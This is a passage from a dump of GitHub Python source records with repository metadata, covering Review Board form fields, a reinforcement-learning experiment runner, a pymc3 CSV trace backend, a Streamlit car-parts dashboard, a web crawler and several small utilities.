reviewboard.diffviewer.models.diffcommit.\n DiffCommit):\n The commits to generate context for.\n\n Returns:\n dict:\n A dictionary of context.\n \"\"\"\n submitter_name = self.review_request_details.submitter.get_full_name()\n include_author_name = not submitter_name\n to_expand = set()\n\n for commit in commits:\n if commit.author_name != submitter_name:\n include_author_name = True\n\n if commit.summary.strip() != commit.commit_message.strip():\n to_expand.add(commit.pk)\n\n return {\n 'include_author_name': include_author_name,\n 'to_expand': to_expand,\n }\n\n\nclass MainFieldSet(BaseReviewRequestFieldSet):\n fieldset_id = 'main'\n field_classes = [\n SummaryField,\n DescriptionField,\n TestingDoneField,\n ]\n\n\nclass ExtraFieldSet(BaseReviewRequestFieldSet):\n \"\"\"A field set that is displayed after the main field set.\"\"\"\n\n fieldset_id = 'extra'\n field_classes = [\n CommitListField,\n ]\n\n\nclass InformationFieldSet(BaseReviewRequestFieldSet):\n fieldset_id = 'info'\n label = _('Information')\n field_classes = [\n OwnerField,\n RepositoryField,\n BranchField,\n BugsField,\n DependsOnField,\n BlocksField,\n ChangeField,\n CommitField,\n ]\n\n\nclass ReviewersFieldSet(BaseReviewRequestFieldSet):\n fieldset_id = 'reviewers'\n label = _('Reviewers')\n show_required = True\n field_classes = [\n TargetGroupsField,\n TargetPeopleField,\n ]\n\n\nclass ChangeEntryOnlyFieldSet(BaseReviewRequestFieldSet):\n fieldset_id = '_change_entries_only'\n field_classes = [\n DiffField,\n FileAttachmentCaptionsField,\n ScreenshotCaptionsField,\n FileAttachmentsField,\n ScreenshotsField,\n StatusField,\n ]\n\n\nbuiltin_fieldsets = [\n MainFieldSet,\n ExtraFieldSet,\n InformationFieldSet,\n ReviewersFieldSet,\n ChangeEntryOnlyFieldSet,\n]\n","repo_name":"reviewboard/reviewboard","sub_path":"reviewboard/reviews/builtin_fields.py","file_name":"builtin_fields.py","file_ext":"py","file_size_in_byte":53601,"program_lang":"python","lang":"en","doc_type":"code","stars":1513,"dataset":"github-code","pt":"34"}
{"seq_id":"32255634732","text":"\"\"\"\nUnit testing palindromes using Pytest\n\nLearning from: 
https://www.tutorialspoint.com/pytest/pytest_tutorial.pdf\n\nRemember:\n - Testing function names must start by test*\n\"\"\"\n\nimport pytest\nimport random\nfrom main import *\n\n\n\ndef testValidRanges():\n\t# Ranges must be valid, ie end always > initial\n\t\n\tfor initial in range(1000):\n\t\tend = random.randint(0, 1000)\t\n\t\tfnResult = generatePalindromes(initial, end)\n\t\tif initial < end:\n\t\t\tassert fnResult[2] == \"Valid Range\", \"Fails with initial:\" + str(initial) + \", end:\" + str(end)\n\t\telse:\n\t\t\tassert fnResult[2] == \"Invalid Range\", \"Fails with initial:\" + str(initial) + \", end:\" + str(end)\n\ndef testUpperLowerLimits():\n\t# Includes both upper and lower limits\n\tassert generatePalindromes(100, 101) == [[101], 1, \"Valid Range\"], \"Fails to include upper limit\"\n\tassert generatePalindromes(101, 102) == [[101], 1, \"Valid Range\"], \"Fails to include lower limit\"\n\t\ndef testSomePalindromes():\n\t# Testing some palindromes\n\t\n\tpalindromes = [109901, 9999999, 1, 44, 1001001, 400004, 313]\n\t\n\tfor element in palindromes:\n\t\tfnResult = generatePalindromes(element, element+1)\n\t\tassert fnResult[0][0] == element, \"failed at \" + str(fnResult)\n","repo_name":"iagovar/openbootcamp","sub_path":"99 Reto Python/0 numerosDelReves/palindromes_test.py","file_name":"palindromes_test.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32172513731","text":"import warnings\nfrom pathlib import Path\nfrom typing import List, Optional\n\nimport click\n\nfrom .agents import Agent, DQNLikeAgent, DQNLikeParallel, EpisodeResult\nfrom .lib.mpi import IS_MPI_ROOT\nfrom .prelude import DEFAULT_SAVEFILE_NAME\n\n\nclass Experiment:\n def __init__(\n self,\n ag: Agent,\n save_file_name: Optional[str] = None,\n ) -> None:\n if isinstance(ag, DQNLikeAgent) and ag.config.nworkers > 1:\n self.ag = DQNLikeParallel(ag)\n else:\n self.ag = ag\n self.logger = ag.logger\n self.config = ag.config\n self.logger.summary_setting(\n \"train\",\n [\"episodes\", \"total_steps\", \"update_steps\"],\n interval=ag.config.episode_log_freq,\n color=\"red\",\n )\n self.logger.summary_setting(\n \"eval\",\n [\"total_steps\", \"update_steps\"],\n interval=ag.config.eval_times,\n color=\"green\",\n )\n self._save_file_name = save_file_name or DEFAULT_SAVEFILE_NAME\n self._has_eval_parallel = hasattr(self.ag, \"eval_parallel\")\n self.episode_offset = 0\n self.config.initialize_hooks()\n self.noeval = False\n\n def log_episode(self, episodes: int, results: List[EpisodeResult]) -> None:\n for i, res in enumerate(results):\n self.logger.submit(\n \"train\",\n episodes=episodes + i + self.episode_offset,\n total_steps=self.ag.total_steps,\n update_steps=self.ag.update_steps,\n return_=res.return_,\n length=res.length,\n )\n\n def log_eval(self, episodes: int, eval_render: bool = False) -> None:\n if self.noeval:\n self._msg(\"Do not run evaluation since noeval=True\")\n return\n\n results = self._eval_impl(render=eval_render)\n for res in results:\n self.logger.submit(\n \"eval\",\n total_steps=self.ag.total_steps,\n update_steps=self.ag.update_steps,\n return_=res.return_,\n length=res.length,\n )\n\n @staticmethod\n def _has_period(turn: int, width: int, freq: Optional[int]) -> bool:\n return freq and turn != 0 and turn // freq != (turn - width) // freq\n\n def _save(self, suffix: str = \"\") -> None:\n self.ag.save(self._save_file_name + suffix, self.logger.logdir)\n\n def _msg(self, msg: 
str, fg: str = \"black\", error: bool = False) -> None:\n click.secho(\"☔ \" + msg + \" ☔\", bg=\"white\", fg=fg, err=error)\n\n def abort(self, msg: str) -> None:\n self._msg(msg, fg=\"red\", error=True)\n self.ag.close()\n\n def switch_agent(self, new_ag: Agent, load: bool = False) -> Agent:\n new_ag.logger = self.logger\n new_ag.total_steps = self.ag.total_steps\n old_ag = self.ag\n self.ag = new_ag\n if load:\n # Only restore saved weights when the caller asks for it.\n self._load_agent(self.logger.logdir)\n return old_ag\n\n def train(\n self,\n saveid_start: int = 0,\n eval_render: bool = False,\n pretrained_agent_path: Optional[str] = None,\n ) -> None:\n if not self.logger.ready:\n self.logger.setup_logdir()\n logdir = self.logger.logdir.as_posix()\n self._msg(f\"Train started (Logdir: {logdir})\")\n\n if pretrained_agent_path is not None:\n if self._load_agent(Path(pretrained_agent_path)) is None:\n self.abort(f\"{pretrained_agent_path} does not exist!\")\n return\n else:\n self._msg(f\"Loaded {pretrained_agent_path} before training\")\n\n episodes = 0\n steps = 0\n save_id = saveid_start\n\n for res in self.ag.train_episodes(self.config.max_steps):\n ep_len = len(res)\n if ep_len > 0 and IS_MPI_ROOT:\n self.log_episode(episodes, res)\n episodes += ep_len\n step_diff = self.ag.total_steps - steps\n steps = self.ag.total_steps\n\n if not IS_MPI_ROOT:\n continue\n\n # Evaluate the agent\n if self._has_period(steps, step_diff, self.config.eval_freq):\n self.log_eval(episodes, eval_render)\n # Save models\n if self._has_period(steps, step_diff, self.config.save_freq):\n self._save(suffix=\".{}\".format(save_id))\n save_id += 1\n\n self.log_eval(episodes, eval_render)\n self._save()\n self.ag.close()\n\n def _eval_impl(\n self,\n render: bool = False,\n replay: bool = False,\n pause: bool = False,\n ) -> List[EpisodeResult]:\n n = self.config.eval_times\n self.ag.set_mode(train=False)\n if self._has_eval_parallel and not (render or replay) and n > 1:\n res = self.ag.eval_parallel(n) # type: ignore\n else:\n res = [self.ag.eval_episode(render=render, pause=pause) for _ in range(n)]\n self.ag.set_mode(train=True)\n return res\n\n def _load_agent(self, logdir_or_file: Path) -> Optional[Path]:\n if not logdir_or_file.exists():\n return None\n if logdir_or_file.is_file():\n fullpath = logdir_or_file\n else:\n fullpath = logdir_or_file.joinpath(self._save_file_name)\n if self.ag.load(fullpath):\n return fullpath\n else:\n raise ValueError(f\"Failed to load {fullpath}\")\n\n def _retrain_impl(self, additional_steps: int, eval_render: bool = False) -> None:\n self.ag.config.max_steps += additional_steps\n self.ag.initialize_rollouts()\n save_files = list(self.logger.logdir.glob(self._save_file_name + \".*\"))\n if len(save_files) > 0:\n save_id = len(save_files)\n else:\n save_id = 0\n self.train(save_id, eval_render)\n\n def retrain(\n self,\n logdir_or_file: str,\n additional_steps: int = 100,\n eval_render: bool = False,\n ) -> None:\n agent_file = self._load_agent(Path(logdir_or_file))\n if agent_file is None:\n self.abort(f\"{logdir_or_file} does not exist!\")\n return\n self._msg(f\"Loaded {agent_file} for re-training\")\n total_steps, episodes = self.logger.retrive(agent_file.parent)\n self.ag.total_steps = total_steps\n self.episode_offset = episodes\n self._retrain_impl(additional_steps, eval_render)\n\n def evaluate(\n self,\n render: bool = False,\n replay: bool = False,\n pause: bool = False,\n ) -> None:\n result = self._eval_impl(render, replay, pause)\n click.secho(\"====== Results ======\", bg=\"cyan\", fg=\"black\")\n if len(result) == 1:\n click.echo(result[0])\n else:
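\n # NOTE (illustrative, not part of the original file): the import below is\n # deferred so that pandas -- which LogStore.into_df() presumably needs to\n # build the DataFrame summarized via df.describe() -- is only required\n # when evaluation actually runs.\n 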
from rainy.utils import LogStore\n\n eval_log = LogStore()\n for res in result:\n eval_log.submit(dict(rewards=res.return_, length=res.length))\n df = eval_log.into_df()\n click.echo(df)\n click.secho(\"====== Summary ======\", bg=\"cyan\", fg=\"black\")\n click.echo(df.describe())\n if render:\n click.pause(\"---Press any key to exit---\")\n if replay:\n try:\n self.config.eval_env.unwrapped.replay()\n except Exception:\n warnings.warn(\"This environment does not support replay\")\n self.ag.close()\n\n def load_and_evaluate(\n self,\n logdir_or_file: str,\n render: bool = False,\n replay: bool = False,\n pause: bool = False,\n ) -> None:\n agent_file = self._load_agent(Path(logdir_or_file))\n if agent_file is None:\n self.abort(f\"{logdir_or_file} does not exist!\")\n return\n self._msg(f\"Loaded {agent_file} for evaluation\")\n self.evaluate(render=render, replay=replay, pause=pause)\n\n def random(\n self,\n render: bool = False,\n replay: bool = False,\n pause: bool = False,\n ) -> None:\n res = self.ag.random_episode(render=render, pause=pause)\n click.echo(res)\n if render:\n click.pause(\"---Press any key to exit---\")\n if replay:\n try:\n self.config.eval_env.unwrapped.replay()\n except Exception:\n warnings.warn(\"This environment does not support replay\")\n self.ag.close()\n","repo_name":"kngwyu/Rainy","sub_path":"rainy/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":8372,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"34"} +{"seq_id":"14808297424","text":"\"\"\"expense_manager URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\n\n# from owner.views import OwnerViewSet\nfrom transaction.views import *\nfrom сategory.views import *\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('auth/', include('djoser.urls')),\n path('auth/', include('djoser.urls.authtoken')),\n path('api/v1/transaction_delete/<int:pk>/', TransactionAPIDestroy.as_view()),\n path('api/v1/transaction/', TransactionAPIList.as_view()),\n path('api/v1/transaction/<int:pk>/', TransactionAPIUpdate.as_view()),\n path('api/v1/category/', CategoryAPIList.as_view()),\n path('api/v1/category/<int:pk>/', CategoryAPIUpdate.as_view()),\n path('api/v1/category_delete/<int:pk>/', CategoryAPIDestroy.as_view()),\n # path('api/v1/ownerslist/', OwnerViewSet.as_view({\"get\": \"list\"})),\n # path('api/v1/ownerslist/<int:pk>/', OwnerViewSet.as_view({\"put\": \"update\"})),\n # path('api/v1/', include(router.urls)), # http://127.0.0.1:8000/api/v1/category/\n\n]
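\n\n# (Illustrative note, not in the original file: '<int:pk>' is a Django path\n# converter -- it matches an integer URL segment and passes it to the view as\n# the 'pk' keyword argument, which the update/destroy views above rely on to\n# look up a single object.)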
option(s) inconnue(s)...\")\n    exit()\n\n# reads the file given as an option\n# for example: python3 blocpad.py -r note.txt\n# starts the script in read mode and prints the contents of note.txt\ndef lire(datas):\n    try:\n        with open(datas, \"r\") as fichier:\n            contenu = fichier.read()\n            print(f\"\\n{contenu}\\n\")\n            exit()\n    except OSError:\n        print(\"le fichier spécifié n'existe pas !\")\n\n# appends a note to the file given as an option\n# for example: python3 blocpad.py -w note.txt\n# starts the script in write mode and saves the typed note into the given file\ndef ajout(datas):\n    message = input(\" > \")\n    if message != \"\":\n        message = f\"{horodatage()} : {message} \\n\"\n        with open(datas, \"a\") as fichier:\n            fichier.write(message)\n        exit()\n    else:\n        exit()\n\n# re-reads the file given as an option at a regular interval\n# for example: python3 blocpad.py -s note.txt\n# starts the script in watch mode and re-reads note.txt every 20 seconds\n# note that this mode only shows the last 10 lines of the given file\ndef surveille(datas):\n    while True:\n        try:\n            os.system(\"cls\" if os.name == \"nt\" else \"clear\")\n            try:\n                with open(datas, \"r\") as fichier:\n                    try:\n                        contenu = fichier.readlines()[-10:]\n                        for x in contenu:\n                            print(x.replace(\"\\n\", \"\"))\n                    except Exception:\n                        contenu = fichier.read()\n                        print(f\"\\n{contenu}\")\n                    finally:\n                        print(f\"\\n... EN ATTENTE ... dernier accès : {horodatage()}\")\n                        print(f\"... Ctrl-Z pour terminer et revenir au Terminal ...\")\n                        time.sleep(20)\n            except OSError:\n                print(\"le fichier spécifié n'existe pas !\")\n                break\n        except KeyboardInterrupt:\n            print(\"... FIN DE L'ECHANGE ...\")\n            break\n\n# appends to the file given as an option without leaving the program\n# for example: python3 blocpad.py -d note.txt\n# starts the script in chat mode and keeps adding content to the file as long as\n# the input prompt is not left empty; an empty input stops the script\ndef discussion(datas):\n    while True:\n        os.system(\"cls\" if os.name == \"nt\" else \"clear\")\n        print(\"... EN MODE DISCUSSION ...\")\n        print(\"... 
laisser le champs de saisie libre et appuyer sur Entrée pour finir !\")\n        message = input(\" > \")\n        if message == \"\":\n            break\n        message = f\"{horodatage()} : {message} \\n\"\n        with open(datas, \"a\") as fichier:\n            fichier.write(message)\n\n# simply builds a timestamp line combining the current PC user name, the date and the time\ndef horodatage():\n    jour = date.today()\n    heure = datetime.now()\n    login = getpass.getuser()\n    moment = login + \" - \" + jour.strftime(\"%d/%m/%Y\") + \" - \" + heure.strftime(\"%H:%M:%S\")\n    return moment\n\n####################################################################################################\n### program start...\n####################################################################################################\nmain(sys.argv)\n","repo_name":"dnl-85/blocpad_py","sub_path":"blocpad.py","file_name":"blocpad.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}{"seq_id":"13709607274","text":"\nfrom urllib.parse import urlparse\nfrom handler import Handler\nimport os\nimport requests\nfrom job_handler import submitJob\n\nclass GatherPodLogs(Handler):\n    def __init__(self):\n        Handler.__init__(self,\"/gather-extra/artifacts/pods\")\n\n    def getFileParts(self,url):\n        partsDef = {\n            'namespace': None,\n            'podName': None,\n            'container': None,\n            'previous': False\n        }\n\n        logFileName = url.rsplit('/', 1)[-1]\n\n        parts = logFileName.split('_')\n\n        if len(parts) < 3:\n            return partsDef\n        partsDef['namespace'] = parts[0]\n        partsDef['podName'] = parts[1]\n        partsDef['container'] = parts[2]\n        if len(parts)>=4:\n            partsDef['previous'] = parts[3] == 'previous'\n        return partsDef\n\n    def downloadFile(self,parts, url):\n        path = 'out/namespaces/'+ \\\n            parts['namespace']+ \\\n            '/pods/'+ \\\n            parts['podName']+'/' +\\\n            parts['container']+'/' +\\\n            parts['container']+'/logs/'\n\n        if not os.path.exists(path):\n            os.makedirs(path)\n\n        outPath = \"\"\n        if parts['previous']: \n            outPath = os.path.join(path,\"previous.log\")\n        else:\n            outPath = os.path.join(path,\"current.log\")\n\n        r = requests.get(url)\n\n        print(\"Saving pod log [\"+outPath+\"]\")\n        with open(outPath, 'wb') as f:\n            f.write(r.content) \n\n    def handle(self,url): \n        if not url.endswith(\".log\"):\n            return \n\n        parts = self.getFileParts(os.path.splitext(url)[0])\n        if parts['namespace'] is None or \\\n            parts['podName'] is None or \\\n            parts['container'] is None:\n            return\n\n        submitJob(self.downloadFile, parts, url)\n\n","repo_name":"rvanderp3/prow-adapter","sub_path":"gather_pod_logs.py","file_name":"gather_pod_logs.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"}{"seq_id":"37347374247","text":"\"\"\"Text file trace backend\n\nStore sampling values as CSV files.\n\nFile format\n-----------\n\nSampling values for each chain are saved in a separate file (under a\ndirectory specified by the `name` argument). The rows correspond to\nsampling iterations. The column names consist of variable names and\nindex labels. For example, the heading\n\n  x,y__0_0,y__0_1,y__1_0,y__1_1,y__2_0,y__2_1\n\nrepresents two variables, x and y, where x is a scalar and y has a\nshape of (3, 2).\n\"\"\"\nfrom glob import glob\nimport os\nimport pandas as pd\n\nfrom ..backends import base, ndarray\nfrom . 
import tracetab as ttab\nfrom ..theanof import floatX\n\n\nclass Text(base.BaseTrace):\n \"\"\"Text trace object\n\n Parameters\n ----------\n name : str\n Name of directory to store text files\n model : Model\n If None, the model is taken from the `with` context.\n vars : list of variables\n Sampling values will be stored for these variables. If None,\n `model.unobserved_RVs` is used.\n test_point : dict\n use different test point that might be with changed variables shapes\n \"\"\"\n\n def __init__(self, name, model=None, vars=None, test_point=None):\n if not os.path.exists(name):\n os.mkdir(name)\n super().__init__(name, model, vars, test_point)\n\n self.flat_names = {v: ttab.create_flat_names(v, shape)\n for v, shape in self.var_shapes.items()}\n\n self.filename = None\n self._fh = None\n self.df = None\n\n # Sampling methods\n\n def setup(self, draws, chain):\n \"\"\"Perform chain-specific setup.\n\n Parameters\n ----------\n draws : int\n Expected number of draws\n chain : int\n Chain number\n \"\"\"\n if self._fh is not None:\n self._fh.close()\n\n self.chain = chain\n self.filename = os.path.join(self.name, 'chain-{}.csv'.format(chain))\n\n cnames = [fv for v in self.varnames for fv in self.flat_names[v]]\n\n if os.path.exists(self.filename):\n with open(self.filename) as fh:\n prev_cnames = next(fh).strip().split(',')\n if prev_cnames != cnames:\n raise base.BackendError(\n \"Previous file '{}' has different variables names \"\n \"than current model.\".format(self.filename))\n self._fh = open(self.filename, 'a')\n else:\n self._fh = open(self.filename, 'w')\n self._fh.write(','.join(cnames) + '\\n')\n\n def record(self, point):\n \"\"\"Record results of a sampling iteration.\n\n Parameters\n ----------\n point : dict\n Values mapped to variable names\n \"\"\"\n vals = {}\n for varname, value in zip(self.varnames, self.fn(point)):\n vals[varname] = value.ravel()\n columns = [str(val) for var in self.varnames for val in vals[var]]\n self._fh.write(','.join(columns) + '\\n')\n\n def close(self):\n if self._fh is not None:\n self._fh.close()\n self._fh = None # Avoid serialization issue.\n\n # Selection methods\n\n def _load_df(self):\n if self.df is None:\n self.df = pd.read_csv(self.filename)\n for key, dtype in self.df.dtypes.iteritems():\n if \"float\" in str(dtype):\n self.df[key] = floatX(self.df[key])\n\n\n def __len__(self):\n if self.filename is None:\n return 0\n self._load_df()\n return self.df.shape[0]\n\n def get_values(self, varname, burn=0, thin=1):\n \"\"\"Get values from trace.\n\n Parameters\n ----------\n varname : str\n burn : int\n thin : int\n\n Returns\n -------\n A NumPy array\n \"\"\"\n self._load_df()\n var_df = self.df[self.flat_names[varname]]\n shape = (self.df.shape[0],) + self.var_shapes[varname]\n vals = var_df.values.ravel().reshape(shape)\n return vals[burn::thin]\n\n def _slice(self, idx):\n if idx.stop is not None:\n raise ValueError('Stop value in slice not supported.')\n return ndarray._slice_as_ndarray(self, idx)\n\n def point(self, idx):\n \"\"\"Return dictionary of point values at `idx` for current chain\n with variables names as keys.\n \"\"\"\n idx = int(idx)\n self._load_df()\n pt = {}\n for varname in self.varnames:\n vals = self.df[self.flat_names[varname]].iloc[idx].values\n pt[varname] = vals.reshape(self.var_shapes[varname])\n return pt\n\n\ndef load(name, model=None):\n \"\"\"Load Text database.\n\n Parameters\n ----------\n name : str\n Name of directory with files (one per chain)\n model : Model\n If None, the model is taken from the 
`with` context.\n\n Returns\n -------\n A MultiTrace instance\n \"\"\"\n files = glob(os.path.join(name, 'chain-*.csv'))\n\n if len(files) == 0:\n raise ValueError('No files present in directory {}'.format(name))\n\n straces = []\n for f in files:\n chain = int(os.path.splitext(f)[0].rsplit('-', 1)[1])\n strace = Text(name, model=model)\n strace.chain = chain\n strace.filename = f\n straces.append(strace)\n return base.MultiTrace(straces)\n\n\ndef dump(name, trace, chains=None):\n \"\"\"Store values from NDArray trace as CSV files.\n\n Parameters\n ----------\n name : str\n Name of directory to store CSV files in\n trace : MultiTrace of NDArray traces\n Result of MCMC run with default NDArray backend\n chains : list\n Chains to dump. If None, all chains are dumped.\n \"\"\"\n if not os.path.exists(name):\n os.mkdir(name)\n if chains is None:\n chains = trace.chains\n\n for chain in chains:\n filename = os.path.join(name, 'chain-{}.csv'.format(chain))\n df = ttab.trace_to_dataframe(\n trace, chains=chain, include_transformed=True)\n df.to_csv(filename, index=False)\n","repo_name":"manuwhs/Trapyng","sub_path":"Examples/5.2 HBM/pymc3-master/pymc3/backends/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":5994,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"34"} +{"seq_id":"70532468258","text":"import os, traceback, openpyxl, phonenumbers\n\n# rowsCount - Get last row index (As sheet.max_row is not calculating correctly, doing it manually)\ndef rowsCount(sheet):\n maxRow = 1\n\n # Traverse reversely and check if any record is not empty (which is the last record)\n for row in range(sheet.max_row, 0, -1):\n if any(cell.value is not None for cell in sheet[row]):\n maxRow = row\n break\n\n return maxRow\n\n# rowsCount\n\n# validateMobileNumber\ndef validateMobileNumber(excelFilePath, mobileNoColumnIndex):\n wb = openpyxl.load_workbook(excelFilePath)\n sheet = wb.active\n\n rowsCountBeforeDelete = rowsCount(sheet)\n rowsToDelete = []\n\n # iterate rows\n for row in range(2, rowsCountBeforeDelete + 1):\n mobileNo = sheet.cell(row, mobileNoColumnIndex).value\n isValid = False\n\n if mobileNo:\n print(f'Validating {mobileNo} at row: {row} ...')\n\n try:\n res = phonenumbers.parse(mobileNo)\n\n if res and phonenumbers.is_valid_number(res):\n mobileNoType = phonenumbers.number_type(res)\n\n # Allow only mobile numbers\n if mobileNoType == phonenumbers.PhoneNumberType.MOBILE or mobileNoType == phonenumbers.PhoneNumberType.FIXED_LINE_OR_MOBILE:\n isValid = True\n except phonenumbers.NumberParseException:\n print(f'Error when parsing {mobileNo}:\\n' + traceback.format_exc() + '\\n')\n\n isValid = False\n\n if not isValid:\n print(f'Invalid: {mobileNo}\\n')\n\n rowsToDelete.append(row)\n\n if len(rowsToDelete) > 0:\n print('Deleting ' + str(len(rowsToDelete)) + ' invalid records...')\n\n # Warning: Delete would take some long time\n for rowIndex in rowsToDelete[::-1]:\n sheet.delete_rows(rowIndex)\n\n rowsCountAfterDelete = rowsCount(sheet)\n\n print(f'No of records before deletion: {rowsCountBeforeDelete}')\n print(f'No of records deleted: {len(rowsToDelete)}')\n print(f'No of records remaining: {rowsCountAfterDelete}')\n\n # Check whether deleted correctly\n if (rowsCountAfterDelete + len(rowsToDelete)) == rowsCountBeforeDelete:\n print('Updating the Excel file...')\n\n wb.save(excelFilePath)\n else:\n print('Total mismatch: [Deleted rows + Remaining records] should be equal to [Records before deletion].')\n else:\n print('All records are 
valid. No changes are needed in the file.')\n\n# validateMobileNumber\n\nif __name__ == '__main__':\n    excelFilePath = input('Enter the path to Excel file: ')\n\n    if excelFilePath and os.path.isfile(excelFilePath):\n        mobileNoColumnIndex = input('Enter the Mobile number column index (starts with 1): ')\n\n        if not mobileNoColumnIndex.isnumeric() or int(mobileNoColumnIndex) < 1:\n            print('Invalid column index.')\n            quit()\n        else:\n            mobileNoColumnIndex = int(mobileNoColumnIndex)\n    else:\n        print('Invalid file or the file does not exist.')\n        quit()\n\n    validateMobileNumber(excelFilePath, mobileNoColumnIndex)\n","repo_name":"team-proflujo/useful-scripts","sub_path":"excel/mobile-number-validator.py","file_name":"mobile-number-validator.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}{"seq_id":"75119909856","text":"import pickle\nimport pandas as pd\nimport streamlit as st\nfrom joblib import load\nimport plotly.express as px\n\nst.set_page_config(page_title=\"Dashboard change parts\",\n                   page_icon=\"👨‍🔧\",\n                   layout=\"wide\")\n\nwith open(\"model/all_columns.pickle\", \"rb\") as f:\n    all_columns = pickle.load(f)\n\n\ndef anio_group(anio):\n    \"\"\"\n    Calculate the year-range bucket for a given model year.\n    :param anio: int, year of manufacture\n    :return: str, year range\n    \"\"\"\n    if 2021 <= anio <= 2024:\n        anio_range = \"2024 - 2021\"\n    elif 2017 <= anio <= 2020:\n        anio_range = \"2020 - 2017\"\n    elif 2013 <= anio <= 2016:\n        anio_range = \"2016 - 2013\"\n    elif 2009 <= anio <= 2012:\n        anio_range = \"2012 - 2009\"\n    elif 2005 <= anio <= 2008:\n        anio_range = \"2008 - 2005\"\n    else:\n        anio_range = \"2004 - atrás\"\n\n    return anio_range\n\nst.markdown(\"## Modelo machine learning recambio de piezas siniestros\")\nst.markdown(\"### Estructura de archivo a subir ejemplo: \")\n\ndf_example = pd.read_csv(\"data/data.csv\", nrows=5)\ndf_example = df_example.drop(columns=[\"accion\", \"accion_modelo\"])\n\nst.dataframe(df_example)\n\nst.markdown(\"### Por favor suba sus datos en formato .csv teniendo en cuenta el ejemplo anterior:\")\nst.warning('Tener en cuenta que es un demo en la capa gratuita de AWS no soporta mas de 50 filas', icon=\"⚠️\")\ndata_user = st.file_uploader(\"Datos a analizar:\", type={\"csv\", \"txt\"})\nif data_user is not None:\n    df_user = pd.read_csv(data_user)\nelse:\n    df_user = None\n\nif df_user is not None:\n    st.markdown(\"Primeras 20 filas de sus datos:\")\n    st.dataframe(df_user.head(20))\n    fig = px.histogram(df_user,\n                       x=\"marca\")\n    st.markdown(f\"Usted **subió {len(df_user)} partes** de las siguientes marcas: \")\n\n    fig.update_xaxes(tickangle=30)\n    st.plotly_chart(fig, use_container_width=True)\n\n    st.markdown(\"### Pulse Calcular para hacer las predicciones\")\n\n    fit_model = st.button(\"Calcular\")\n\n    if fit_model:\n        with st.spinner(\"Analizando ..\"):\n            df = df_user.drop(columns=[\"numero_aviso\",\n                                       \"marca\",\n                                       \"linea\",\n                                       \"nombre\"])\n\n            anio_range_list = list(map(anio_group, list(df[\"anio\"])))\n            df[\"anio_range\"] = anio_range_list\n            df = df.drop(columns=[\"anio\"])\n\n            df[\"grupo\"] = df[\"grupo\"].astype(str)\n            df[\"subgrupo\"] = df[\"subgrupo\"].astype(str)\n\n            df_model = pd.get_dummies(df)\n\n            for i in range(len(all_columns)):\n                if all_columns[i] not in df_model.columns:\n                    df_model[all_columns[i]] = 0\n\n            X = df_model.values\n\n            lr_model = load('model/lr_class.joblib')\n\n            action = []\n            for i in range(len(X)):\n                temp = lr_model.predict(X[i].reshape(1, -1))[0]\n                if temp:\n                    temp2 = \"cambiar\"\n                
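# the classifier returns True when a part must be replaced (\"cambiar\") and False when it can be repaired (\"reparar\")\n                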
else:\n                    temp2 = \"reparar\"\n                action.append(temp2)\n\n            df_user[\"action\"] = action\n\n            st.dataframe(df_user)\n\n            st.markdown(\"### Resumen de recambios\")\n\n            fig = px.histogram(df_user,\n                               x=\"action\")\n\n            fig.update_xaxes(tickangle=30)\n            st.plotly_chart(fig, use_container_width=True)\n","repo_name":"Oriojas/test_ia_incidents_cars","sub_path":"front_app.py","file_name":"front_app.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}{"seq_id":"35539522214","text":"#!/usr/bin/env python\n\n\"\"\"\nA Python program which takes in a starting URL and traverses all links found,\nand their links and so on, to obtain 100 unique URLs.\n\"\"\"\n\nimport os\nimport sys\nimport shutil\nfrom pathlib import Path\nfrom urllib.parse import urlparse\n\nimport tldextract\nimport numpy as np\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.common.exceptions import TimeoutException\nfrom bs4 import BeautifulSoup, SoupStrainer\n\n\n# number of unique urls to download\nTARGET_URLS = 100\n\n# name of temp dir to store html files\nHTML_DIR = \"htmls\"\n\n\nclass SimpleWebCrawler:\n    def __init__(self, url):\n        self.start_url = url\n\n        self.url_array = np.empty(shape=TARGET_URLS, dtype=object)\n        self.urls_found = 0\n        self.urls_searched = 0\n\n        self.html_dir = Path(HTML_DIR).absolute()\n        if os.path.exists(self.html_dir):\n            shutil.rmtree(self.html_dir) # clear existing directory\n        os.mkdir(self.html_dir) # create fresh directory\n\n        # selenium\n        driver_options = Options()\n        driver_options.headless = True\n        self.driver = webdriver.Firefox(options=driver_options)\n        self.driver.set_page_load_timeout(20) # in seconds\n\n    def search(self):\n        \"\"\"\n        Call this function to start the URL search process from start_url.\n\n        :return: None\n        \"\"\"\n        self.__search_url(self.start_url, inc_searched=False)\n\n    def __search_url(self, url_to_search, inc_searched=True):\n        \"\"\"\n        Searches the given URL for links, then recursively searches the links found\n        until TARGET_URLS number of URLs have been recorded.\n\n        :param url_to_search: Valid URL to scrape for links\n        :param inc_searched: Whether to increment urls_searched\n        :return: None\n        \"\"\"\n        link_soup = self.__get_html_link_soup(url_to_search)\n\n        if link_soup is not None:\n            # find all links in the soup\n            self.__find_urls(link_soup)\n\n            if self.urls_found == TARGET_URLS:\n                # 